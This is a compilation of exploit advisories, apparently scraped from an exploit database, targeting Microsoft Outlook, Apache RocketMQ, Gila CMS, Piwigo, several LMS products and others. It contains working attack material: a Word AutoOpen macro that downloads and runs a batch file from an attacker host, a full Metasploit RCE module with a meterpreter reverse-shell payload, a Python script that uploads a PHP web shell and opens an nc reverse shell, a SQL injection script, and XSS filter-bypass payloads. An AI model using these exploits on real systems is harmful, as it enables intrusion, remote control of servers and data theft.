<pre><code>## Title: Microsoft Outlook ®Microsoft 365 MSO (Version 2306 Build<br />16.0.16529.20100) 32-bit RCE<br />## Author: nu11secur1ty<br />## Date: 07.07.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://outlook.live.com/owa/<br />## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/<br />## CVE-2023-33131<br /><br /><br />## Description:<br />In this vulnerability, the Microsoft Outlook app allows an attacker to<br />send an infected Word file with malicious content<br />to everyone who using the Outlook app, no matter web or local.<br />Microsoft still doesn't have a patch against this 0-day vulnerability today.<br /><br />## Staus: HIGH Vulnerability<br /><br />[+]Exploit:<br /><br />- The malicious Word file:<br /><br />```js<br />Sub AutoOpen()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat ><br />nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)<br />End Sub<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)<br /><br />## Time spend:<br />00:30:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and<br />https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: Mastery LMS 1.2 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 09/07/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/mastery/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br /><br />## Description<br /><br />Allow Attacker to inject malicious code into website, give ability to steal sensitive<br />information, manipulate data, and launch additional attacks.<br /><br /><br /><br />Path: /browse<br /><br />GET parameter 'search' is vulnerable to XSS<br /><br />https://website/browse?search=[XSS]<br /><br />GET parameter 'featured' is vulnerable to XSS<br /><br />https://website/browse?featured=[XSS]<br /><br />GET parameter 'recommended' is vulnerable to XSS<br /><br />https://website/browse?recommended=[XSS]<br /><br />GET parameter 'skill' is vulnerable to XSS<br /><br />https://website/browse?skill=[XSS]<br /><br /><br />Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> <br />XSS Filter Bypass : "><script>alert(1)</script><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Academy LMS 5.15 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 09/07/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/academy/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br /><br />## Description<br /><br />Allow Attacker to inject malicious code into website, give ability to steal sensitive<br />information, manipulate data, and launch additional attacks.<br /><br /><br /><br />Path: /home/courses<br /><br />GET parameter 'sort_by' is vulnerable to XSS<br /><br />https://website/home/courses?category=photoshop&price=all&level=all&language=all&rating=all&sort_by=[XSS]<br /><br />Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> <br />XSS Filter Bypass : ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Auxiliary::Rocketmq<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache RocketMQ update config RCE',<br /> 'Description' => %q{<br /> RocketMQ versions 5.1.0 and below are vulnerable to Arbitrary Code Injection. Broker component of RocketMQ is<br /> leaked on the extranet and lack permission verification. An attacker can exploit this vulnerability by using<br /> the update configuration function to execute commands as the system users that RocketMQ is running as.<br /> Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.<br /> },<br /> 'Author' => [<br /> 'Malayke', # PoC<br /> 'jheysel-r7', # module - RCE portion<br /> 'h00die', # module - Version detection & parsing<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT#usage-examples'],<br /> [ 'CVE', '2023-33246']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => %w[unix linux],<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Automatic (Unix In-Memory)',<br /> {<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },<br /> 'Type' => :nix_memory<br /> }<br /> ],<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x27"<br /> },<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 60<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-05-23',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'The RocketMQ NameServer port', 9876]),<br /> OptPort.new('BROKER_PORT', [false, 'The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommended)', 10911])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> @version_request_response = send_version_request<br /> @parsed_data = parse_rocketmq_data(@version_request_response)<br /> return Exploit::CheckCode::Unknown('RocketMQ did not respond to the request for version information') unless @parsed_data['version']<br /><br /> version = Rex::Version.new(@parsed_data['version'].gsub('V', ''))<br /> return Exploit::CheckCode::Unknown('Unable to determine the version') unless version<br /><br /> if version > Rex::Version.new('5.0.0')<br /> return Exploit::CheckCode::Appears("RocketMQ version: #{version}") if version <= Rex::Version.new('5.1.0')<br /> elsif version <= Rex::Version.new('4.9.5')<br /> return Exploit::CheckCode::Appears("RocketMQ version: #{version}")<br /> end<br /> Exploit::CheckCode::Safe("RocketMQ version: #{version}")<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> data = '`{"code":25,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":395}filterServerNums=1<br />rocketmqHome=' + cmd.encode('UTF-8') + "\x3b\x0a"<br /> header = [data.length + 3].pack('N') + "\x00\x00\x00"<br /> payload = header + data<br /><br /> begin<br /> vprint_status("Payload command to be executed: #{cmd}")<br /> sock = connect(true, { 'RHOST' => datastore['RHOST'], 'RPORT' => opts[:broker_port].to_i })<br /> vprint_status("Payload is #{data}")<br /> sock.put(payload)<br /> rescue Rex::ConnectionError, ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e<br /> fail_with(Failure::Unreachable, "Unable to connect: #{e.class} #{e.message}")<br /> end<br /> end<br /><br /> def on_new_session(session)<br /> print_status('Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted')<br /><br /> if session.type == 'meterpreter'<br /> pwd = session.fs.dir.pwd<br /> else<br /> pwd = session.shell_command_token('pwd')<br /> end<br /><br /> # The session returned by the exploit spawns inside $ROCKETMQ_HOME/bin<br /> pwd.gsub!('/bin', '')<br /> print_good("Determined the original $ROCKETMQ_HOME: #{pwd}")<br /> print_status('Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value')<br /><br /> execute_command(pwd, { broker_port: @broker_port })<br /> end<br /><br /> def exploit<br /> @version_request_response ||= send_version_request<br /> @parsed_data ||= parse_rocketmq_data(@version_request_response)<br /> @broker_port = get_broker_port(@parsed_data, datastore['rhost'], default_broker_port: datastore['BROKER_PORT'])<br /> print_status("Executing target: #{target.name} with payload #{datastore['PAYLOAD']} on Broker port: #{@broker_port}")<br /> execute_command("-c $@|sh . echo bash -c '#{payload.encoded}'", { broker_port: @broker_port })<br /> end<br />end<br /></code></pre>
<pre><code>#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)<br />#Date: 25 June 2023<br />#Exploit Author: Okan Kurtulus<br />#Vendor Homepage: https://piwigo.org<br />#Version: 13.7.0<br />#Tested on: Ubuntu 22.04<br />#CVE : N/A<br /><br /># Proof of Concept:<br />1– Install the system through the website and log in with any user authorized to upload photos.<br />2– Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded.<br />3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered.<br /><br />#Payload<br /><sCriPt>alert(1);</sCriPt><br /><br /></code></pre>
<pre><code># Exploit Title: Lost and Found Information System v1.0 - SQL Injection<br /># Date: 2023-06-30<br /># country: Iran<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : webapps<br /># Dork : /php-lfis/admin/?page=system_info/contact_information<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-33592<br />import requests<br /><br /># URL of the vulnerable component<br />url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"<br /><br /># Injecting a SQL query to exploit the vulnerability<br />payload = "' OR 1=1 -- "<br /><br /># Send the request with the injected payload<br />response = requests.get(url + payload)<br /><br /># Check if the SQL injection was successful<br />if "admin" in response.text:<br /> print("SQL injection successful!")<br />else:<br /> print("SQL injection failed.")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 05-07-2023<br /># Exploit Author: Omer Shaik (unknown_exploit)<br /># Vendor Homepage: https://gilacms.com/<br /># Software Link: https://github.com/GilaCMS/gila/<br /># Version: Gila 1.10.9<br /># Tested on: Linux<br /><br />import requests<br />from termcolor import colored<br />from urllib.parse import urlparse<br /><br /># Print ASCII art<br />ascii_art = """<br /> ██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗<br />██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝<br />██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗ <br />██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝ <br />╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗<br /> ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝<br /><br /> by Unknown_Exploit<br />"""<br /><br />print(colored(ascii_art, "green"))<br /><br /># Prompt user for target URL<br />target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")<br /><br /># Extract domain from target URL<br />parsed_url = urlparse(target_url)<br />domain = parsed_url.netloc<br />target_url_2 = f"http://{domain}/"<br /><br /># Prompt user for login credentials<br />username = input("Enter the email: ")<br />password = input("Enter the password: ")<br /><br /># Create a session and perform login<br />session = requests.Session()<br />login_payload = {<br /> 'action': 'login',<br /> 'username': username,<br /> 'password': password<br />}<br />response = session.post(target_url, data=login_payload)<br />cookie = response.cookies.get_dict()<br />var1 = cookie['PHPSESSID']<br />var2 = cookie['GSESSIONID']<br /><br /># Prompt user for local IP and port<br />lhost = input("Enter the local IP (LHOST): ")<br />lport = input("Enter the local port (LPORT): ")<br /><br /># Construct the payload<br />payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"<br />payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"<br /><br /># Perform file upload using POST request<br />upload_url = f"{target_url_2}fm/upload"<br />upload_headers = {<br /> "Host": domain,<br /> "Content-Length": "424",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",<br /> "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",<br /> "Accept": "*/*",<br /> "Origin": target_url_2,<br /> "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Accept-Language": "en-US,en;q=0.9",<br /> "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",<br /> "Connection": "close"<br />}<br />upload_data = f'''<br />------WebKitFormBoundarynKy5BIIJQcZC80i2<br />Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"<br />Content-Type: application/x-php<br /><br /><?php system($_GET["cmd"]);?><br /><br />------WebKitFormBoundarynKy5BIIJQcZC80i2<br />Content-Disposition: form-data; name="path"<br /><br />tmp<br />------WebKitFormBoundarynKy5BIIJQcZC80i2<br />Content-Disposition: form-data; name="g_response"<br /><br />content<br />------WebKitFormBoundarynKy5BIIJQcZC80i2--<br />'''<br /><br />upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)<br /><br />if upload_response.status_code == 200:<br /> print("File uploaded successfully.")<br /> # Execute payload<br /> response = session.get(payload_url)<br /> print("Payload executed successfully.")<br />else:<br /> print("Error uploading the file:", upload_response.text)<br /> <br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DANGEROUS MAILER-CLONED V2.0 information disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://thefortune39.company.site/CLONED-VERSION-OF-DANGEROUS-MAILER-p199233403 |<br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] all users and passwords saved as clear text<br /><br />[+] use payload : /storage/info.txt<br /><br />[+] login : /login.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DaillyTools v1 command execution Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://github.com/islamoc/DaillyTools |<br />| # Dork : Coded by Mennouchi Islam Azeddine |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] infected file : PHP_Comments.php<br /><br />[+] Line : 20<br /><br /> Function Name : exec<br /> Variables :$arr<br /><br />[+] PHP_Comments.php?arr= pwd <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CakePHP Test Suite v2.7.0 Xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : https://cakephp.org/ | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload in : <script>alert(/indoushka/);</script> or <marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] create new user and post comment or in search box use payload <br /><br />[+] http://127.0.0.1/forum.groupethika.com/<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>